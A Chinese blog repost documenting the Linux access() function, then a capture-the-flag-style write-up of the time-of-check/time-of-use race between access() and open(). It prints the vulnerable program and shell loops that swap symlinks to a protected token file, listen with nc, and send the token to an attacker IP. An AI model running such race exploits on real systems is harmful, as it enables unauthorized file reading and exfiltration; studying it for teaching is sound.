Linux C:access()时间条件竞争漏洞

最新推荐文章于 2021-05-06 12:25:22 发布
最新推荐文章于 2021-05-06 12:25:22 发布
阅读量431 收藏 1
点赞数 1
原文链接:http://www.cnblogs.com/zlgxzswjy/p/10395977.html
版权

access()函数用来检查调用进程是否可以对指定的文件执行某种操作。

================================================================================

来自:https://blog.csdn.net/tigerjibo/article/details/11712039

1.函数功能:

检查调用进程是否可以对指定的文件执行某种操作。

2.函数原型:

1)函数头文件

#include <stdio.h>
#include <unistd.h>

2)函数

int access(const char * pathname, int mode)

3)形参

pathname:需要检测的文件路劲名

mode:需要测试的操作模式。

4)函数返回值说明

成功执行时,返回0。失败返回-1,errno被设为以下的某个值 
EINVAL: 模式值无效 
EACCES: 文件或路径名中包含的目录不可访问 
ELOOP : 解释路径名过程中存在太多的符号连接 
ENAMETOOLONG:路径名太长 
ENOENT:路径名中的目录不存在或是无效的符号连接 
ENOTDIR: 路径名中当作目录的组件并非目录 
EROFS: 文件系统只读 
EFAULT: 路径名指向可访问的空间外 
EIO:输入输出错误 
ENOMEM: 不能获取足够的内核内存 
ETXTBSY:对程序写入出错

5)mode说明

R_OK 测试读许可权
W_OK 测试写许可权
X_OK 测试执行许可权
F_OK 测试文件是否存在

================================================================================

常见的用法是先用access()函数判断文件是否可以操作,然后再通过open()函数对文件进行相应操作。但是这两者之前存在一个时间差,从而形成了时间条件竞争漏洞,越权读取文件。

参考下面的代码:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

int main(int argc, char **argv)
{
  char *file;
  char *host;

  if(argc < 3) {
      printf("%s file host\n\tsends file to host if you have access to it\n", argv[0]);
      exit(1);
  }

  file = argv[1];
  host = argv[2];

  if(access(argv[1], R_OK) == 0) {
      int fd;
      int ffd;
      int rc;
      struct sockaddr_in sin;
      char buffer[4096];

      printf("Connecting to %s:18211 .. ", host); fflush(stdout);

      fd = socket(AF_INET, SOCK_STREAM, 0);

      memset(&sin, 0, sizeof(struct sockaddr_in));
      sin.sin_family = AF_INET;
      sin.sin_addr.s_addr = inet_addr(host);
      sin.sin_port = htons(18211);

      if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) {
          printf("Unable to connect to host %s\n", host);
          exit(EXIT_FAILURE);
      }

#define HITHERE ".oO Oo.\n"
      if(write(fd, HITHERE, strlen(HITHERE)) == -1) {
          printf("Unable to write banner to host %s\n", host);
          exit(EXIT_FAILURE);
      }
#undef HITHERE

      printf("Connected!\nSending file .. "); fflush(stdout);

      ffd = open(file, O_RDONLY);
      if(ffd == -1) {
          printf("Damn. Unable to open file\n");
          exit(EXIT_FAILURE);
      }

      rc = read(ffd, buffer, sizeof(buffer));
      if(rc == -1) {
          printf("Unable to read from file: %s\n", strerror(errno));
          exit(EXIT_FAILURE);
      }

      write(fd, buffer, rc);

      printf("wrote file!\n");

  } else {
      printf("You don't have access to %s\n", file);
  }
}

先通过access()判断传参文件是否可读(注意:这里access()函数检查的是ruid,而不是euid),然后open()打开文件进行读取并发送数据。access()与open()之间存在时间差,且由于这里access()判断的是ruid,所以可以通过频繁改变目标文件,使得access()和open()判断的不是同一个文件,即可越权打开文件

*****************************************************************************

*利用方法:

假设token文件为当前用户不可读

1、编写脚本,将有权限与没有权限的文件循环指向同一个文件

while true;
do 
    ln -sf /home/flag10/token /tmp/ttt
    ln -sf /tmp/aaa /tmp/ttt
done

2、攻击侧监听18211端口

while true;do nc -lvnp 18211;done

3、执行该程序,获取文件

while true;
do
    /home/flag10/flag10 /tmp/ttt 10.211.55.2
done

 

转载于:https://www.cnblogs.com/zlgxzswjy/p/10395977.html

weixin_30408739
关注
【C语言】access和stat函数
数字人生
03-20 2039
在C语言中,`access` 函数是一个用于检查文件的存在性以及对文件的访问权限的函数。在代码中直接使用对应的宏(如 F_OK),而非硬编码的整数(如 0),可以提高代码的可读性和可移植性。stat 函数成功执行时,将返回0,并将文件的信息填入通过参数 buf 传递的结构体中。在C语言中,`stat` 函数是一个用来获取文件状态信息的函数,定义在 <sys/stat.h> 头文件中。- 如果任一测试失败,或者发生错误,函数返回-1,并且`errno`会被设置为一个特定的错误代码,表明检查失败的原因。
Linux连接mysql报错:Access denied for user ‘root’@‘localhost’(using password: YES)的解决方法
09-09
Linux环境中,当你尝试使用`mysql`命令连接到MySQL数据库时,可能会遇到“Access denied for user 'root'@'localhost' (using password: YES)”的错误。这个错误通常表示你的MySQL服务器拒绝了你的登录尝试,可能...
linux C之access函数
学习是为了探索这个世界的本质
02-20 1042
access():判断是否具有存取文件的权限 相关函数     stat,open,chmod,chown,setuid,setgid 表头文件     #include 定义函数     int access(const char * pathname, int mode); 函数说明     access()会检查是否可以读/写某一已存在的文件。参数mode有几种情况组
linux判断文件是否存在
Make Progress Everyday!
05-03 6720
<br />对于判断文件是否存在,每个人有不同的方法!我通常采用两种方法 : open 和 access ;<br /><br />这个俩个方法有相似之处,且有不同之处;下面为大家详细说明他们的不同之处:<br /><br />open 是打开,读写等操作文件的一个函数,access就是一个判断文件权限的函数。在linux下,由于文件有不同的权限,当当前用户没有对此文件的读权限的时候,用来判断文件是否存在,显然不合适。而access却可以做到。<br /><br />open 的第一个参数是文件路径,第二个
竞争条件漏洞
qq_39249347的博客
07-09 2466
一个常见的竞争条件漏洞 当一个程序的两个并发线程同时访问共享资源时,如果执行时间和顺序不同,会对结果产生影响,这时就称作发生了竞争条件。 检查时间和使用时间:是软件中的一种特殊的竞争条件,它在使用资源前检查某一个条件是否满足时会发生,通常,在条件检查和实际资源使用之间存在一小段时间,检查过的条件如果在这段时间内发生变化,则建立在检查结果的使用授权就有安全问题。 脏牛静态条件漏洞:它允许攻击者修改任何可读但不可写的文件,攻击者可以通过该漏洞获取root权限,该漏洞还影响了基于Linux内核的安全系统。 熔断
不安全文件下载与上传之——上传漏洞时间竞争条件绕过
温柔小薛的博客
04-07 2923
上传漏洞时间竞争条件绕过 原理 服务器先允许你上传文件,然后检测是否合法,不合法再删除,我们要利用的就是在服务器删除前,访问到我们上传的php。 方法 利用条件竞争删除文件时间差绕过。使用命令pip install hackhttp安装hackhttp模块,运行下面的Python代码即可。如果还是删除太快,可以适当调整线程并发数。 1 #!/usr/bin/env python 2...
Node使用Sequlize连接Mysql报错:Access denied for user ‘xxx’@‘localhost’
12-23
Unhandled rejection SequelizeAccessDeniedError: Access denied for user 'lupeng'@'localhost' (using password: YES) 这是Node在使用Sequlize连接Mysql数据时报的错,关键看冒号后面的错误:访问拒绝,关键是...
linuxaccess函数的用法介绍
01-01
Linux内核总是根据进程的有效用户ID和有效组ID来决定一个进程是否有权访问某个文件。因此,在编写调整用户ID的程序时,在读写一个文件之前必须明确检查其用户是否原本就有对此文件的访问权限。为了实现这种确认,...
易语言Access条件分页
08-15
易语言Access条件分页是一种在编程中实现数据库查询与数据展示的技术,主要应用于Windows桌面应用开发。易语言是一款以中文为编程语法的编程软件,它使得编程过程更加直观和简单,适合初学者和专业开发者。Access...
安全编程: 避免竞争条件
萝卜青菜
11-25 1221
David A. Wheeler (dwheeler#dwheeler.com) 专职研究员, Institute for Defense Analyses 2004 年 10 月 25日   了解什么是竞争条件,以及它们为什么会引发安全问题。本文向您展示了如何在类 UNIX® (Unix-like)系统中处理常见的竞争条件,包括如何正确地创建锁文件、锁文件的替代者,如何处理文件系统,以及
Linux学习笔记6——access函数
孤独的根号3的博客
12-06 1万+
调用open函数时,是以有效用户而不是实际用户的身份去验证进程对要打开的文件的读写权限。但是有时候我们想知道的是实际用户而非有效用户对某一文件的权限,此时就要用到access函数。   #include&lt;unistd.h&gt; int access(const char* pathname, int mode); int faccessat(int fd, const char* p...
linux C函数之access函数的用法
热门推荐
冀博
09-15 9万+
1.函数功能:检查调用进程是否可以对指定的文件执行某种操作。2.函数原型:1)函数头文件#include #include 2)函数int access(const char * pathname, int mode)3)形参pathname:需要检测的文件路劲名mode:需要测试的操作模式。4)函数返回值说明成功执行时,返回0。失败返回-1,errno被设为以下的某个值 EINVAL: 模式
access open 知乎_如何评价开放获取期刊(Open Access)日渐盛行这一现象?
weixin_39929096的博客
12-22 610
2020年9月10日,Nature在线发表了一篇报道《More than 100 scientific journals have disappeared from the Internet》,报道短讯指出:Researchers have identified dozens of open access journals that went offline between 2000 and 20...
浅析条件竞争
weixin_30646505的博客
06-16 519
【原理】   竞争条件漏洞就是多个进程访问同一资源时产生的时间或者序列的冲突。Linux系统中大量使用并发编程,对资源进行共享,如果产生错误的访问模式,便可能产生内存泄露,系统崩溃,数据破坏等问题。   举一个小例子,下面这段代码定义了两个函数,不看get_flag正常情况下function是输出“NO permission!”但由于变量access是全局变量,在get_flag中被globa...
Linux C中的open函数
weixin_39296438的博客
03-02 4万+
open函数属于Linux中系统IO,用于“打开”文件,代码打开一个文件意味着获得了这个文件的访问句柄。 int fd = open(参数1,参数2,参数3); int fd = open(const char *pathname,int flags,mode_t mode); 1.句柄(file descriptor 简称fd) 首先每个文件都属于自己的句柄,例如标准输入是0,标准输出是...
Race Condition(竞争条件)
涂涂的博客
02-22 1万+
计算机运行过程中,并发、无序、大量的进程在使用有限、独占、不可抢占的资源,由于进程无限,资源有限,产生矛盾,这种矛盾称为竞争(Race)。 由于两个或者多个进程竞争使用不能被同时访问的资源,使得这些进程有可能因为时间上推进的先后原因而出现问题,这叫做竞争条件(Race Condition)。 竞争条件分为两类: -Mutex(互斥):两个或多个进程彼此之间没有内在的制约关系,但是由于要抢占使用某个
关于条件竞争漏洞(Race Conditions)
烟敛寒林的博客
04-29 2738
0x00 一些概念 刚好最近操作系统课也讲到了线程。所以顺便了解一些概念。 条件竞争:系统中,最小的运算调度单位是线程,而每个线程又依附于一个进程,条件竞争则是多进程 或多线程对一个共享资源操作,因为操作顺序 不受控的时候所产生的问题。 进程:进程是为了更好的利用CPU的资源;进程是系统进行资源分配和调度的一个独立单位;每个进程都有自己的独立内存空间,不同进程通过进程间通信来通信;由于进...
Linux C】access 函数讲解
老农民娃哈哈的博客
05-06 1146
Linux access函数讲解_0729Liang-CSDN博客_access函数 函数: #include<unistd.h> int access(const char* pathname, int mode); 参数介绍: pathname 是文件的路径名+文件名 mode:指定access的作用,取值如下 F_OK 值为0,判断文件是否存在 X_OK 值为1,判断对文件是可执行权限 W_OK 值为2,判断对文件是否有写权限 R_OK 值为4,判断对文件是否有读
对于“条件竞争”的利用
baynk的博客
11-05 680
0x01 条件竞争 条件竞争漏洞是一种服务器端的漏洞,是由于开发者设计应用程序并发处理时操作逻辑不合理而造成。当应用面临高并发的请求时未能同步好所有请求,导致请求与请求之间产生等待时出现逻辑缺陷。该漏洞一般出现在与数据库系统频繁交互的位置,例如金额同步、支付等较敏感操作处。另外条件竞争漏洞也会出现在其他位置,例如文件的操作处理等。 0x02 例子1 某平台提现功能的业务处理流程为: 用户发起提现 ...
Unix/Linux编程:access函数详解与应用
"access函数是Linux平台下C编程中用于测试文件访问权限的函数,它按照实际用户ID和实际组ID来检查指定路径的文件或目录是否具备特定的访问权限。该函数返回值为0表示测试成功,即具有相应的访问权限;返回-1则表示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值